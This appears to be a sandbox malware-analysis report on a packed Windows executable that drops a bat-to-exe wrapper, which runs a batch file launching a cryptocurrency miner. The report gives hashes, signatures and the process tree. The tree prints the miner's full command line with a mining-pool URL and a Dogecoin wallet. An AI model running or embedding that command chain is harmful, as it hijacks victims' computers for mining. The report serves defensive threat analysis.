73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
302s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18-02-2024 07:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4652	b2e.exe
3956	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1552-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 968 wrote to memory of 3956	968	cmd.exe	77
PID 968 wrote to memory of 3956	968	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Users\Admin\AppData\Local\Temp\2798.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2798.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2798.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2DD1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2798.tmp\b2e.exe

Filesize
1.2MB

MD5
7b0f4c1d8506067fce25df5de733bcb7

SHA1
053b618c2012c6895e9709696395951acf15c165

SHA256
dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

SHA512
45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

Download Submit
C:\Users\Admin\AppData\Local\Temp\2798.tmp\b2e.exe

Filesize
1.4MB

MD5
fe4bc2bb4397eea601e0fa6c45cc20c6

SHA1
35477fc0a38f9db357a70f9b0573537fca582a9b

SHA256
8852fb3a8294753e6b088d458547feaf54685068ed6bc0dece93f608ab44afa7

SHA512
3759f54232069d2efba631954ff86bbf5ef58a616e4e0109c9ad5fcd632ee97ddf169ebddbe58237dbee36951c8d2e176312abe4e142f636398bff8fc2973bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DD1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
908KB

MD5
444a62042ef43aa39d71196d156c83d5

SHA1
225b9d665404bd03f8471cb7fb790d9d06bda769

SHA256
f4dc3d68e23a5efbd27ae92ebe2b56e8a68705f2d77e3a3d020c65ccee469f4a

SHA512
e6e18dd25ebd6b5ce236cfd368c82587e24bcc58e5c5fd898e4921744447e1eda037c5437d68e12b117bf6548220e46ddd25c282c8d10a40e045be449b9d1258

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
745KB

MD5
de58a99e762cb5e5491864f062f309c3

SHA1
9a1765ed12f971064ee01e01766fefda038e5cd3

SHA256
a0492ea7bd3fad7e121f17eaca7f618e09bb6c449e97c6395bf098a5f9577a81

SHA512
29aa542ece8b9d1f009cb77c611c9cee391f73275bf141c9aa8514bd1922b192a134f518d1de9d6f7ebc93cd022daa3cdb7c2cb3991aa26db04010cf12daddfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
829KB

MD5
8d3323c438fa9525294d38d0ffc53350

SHA1
aaff2bc24eddc8ed55c9d79a69e082efd75de02b

SHA256
fabfd6fc26a937fa4f45d3c05ac031653267b339158234e702f7a3fb6867839e

SHA512
6efc20c02b6ba5119ffef3dfb2265e6246988aa3908670d174c188daff6bc721ac4bc2026a8aab4be781ce77310c38cb0d52d69f8f2c4c8a6ca66b6c43535bca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
925KB

MD5
ba90cbfffaec5588965dda5f899bf8f1

SHA1
2d99e4fa9f408e507040f80e04c3d9b1683ba58f

SHA256
479df7e2bb9a57204aaa34d4a03b1e7045e850f08e4e73d97b722edb3e0ffee3

SHA512
94b193fbbf18750d9c3f4bcda0607a9177409deba6c55fb3c462df03a28a2b250d1c45861f858f84168de609cd208cf3461530e65a9034865ac80e6bd55e7138

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
717KB

MD5
32ce485a3be815133b8f10c2672879bd

SHA1
3c787262661a04d9e5da40386ac71dbfa71507a8

SHA256
97906ff0f36f78ee238ab42616cacae5a395020d9ecf07e373850cad22ec1ecb

SHA512
61213a2680c6a3559366d3ed26d72514c3f746219a4066f5f9f97e9414115461d7a37cc8356107a7ba9e75c7207c7445f2b59e4e2d882859c48cbbcfe8904a0f

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
827KB

MD5
9c731642ed0703b799a3ffa3363b2367

SHA1
ebad67b31658a9a14b1b9d7e2841a6b71831e9ba

SHA256
e7fc6e6ad9b133acaea50ef944d3480c27306e4d43c2d9d96841bd6afe925c6c

SHA512
4727a05c9c8acda5d2badff42878c7387a03d77ea37c84fdf98fdd960871c937c4e8cffbe6578c98f67285fd31e208579f4a7dd8e35f3ebd05cd2bcd4545b2b0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
809KB

MD5
0c50cabee4fd3344705812c0ed4c7787

SHA1
a84764c6b253eac95d6e3cc190e933d80183e760

SHA256
917a3232a59724787dcb12ef7bc4a4ec0edb30157480d16b71c1b5b642dd6784

SHA512
7c4a5121672d8cf60e851e4d925bcc7cf410ba912978cc7d26d9cd2cf123978a3df66ec8ba996ff8963797a26304639e48a3dcfee09852d2b27fc24ffd406b4f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
564KB

MD5
5bbf5895281b9592b345fc7fd3a12bb1

SHA1
6bb0ba60a0e6d9204ab7ea6cf35897c7f4305467

SHA256
dfd5827535e3446b7435344db1a1015e608398f3aa323d9cea9c1ce86089b63e

SHA512
44773cf23cb6c5fae01df107a298e1762550e6b2ef07c1fc3f11f0cb5e13f958a5da0fe8ce6800d7df2158aaae3c9109b8d70ca87fd9ca4ec33d91462d70b77a

Download Submit
memory/1552-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3956-44-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/3956-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3956-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3956-43-0x000000005D8A0000-0x000000005D938000-memory.dmp

Filesize
608KB

Download
memory/3956-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4652-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4652-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download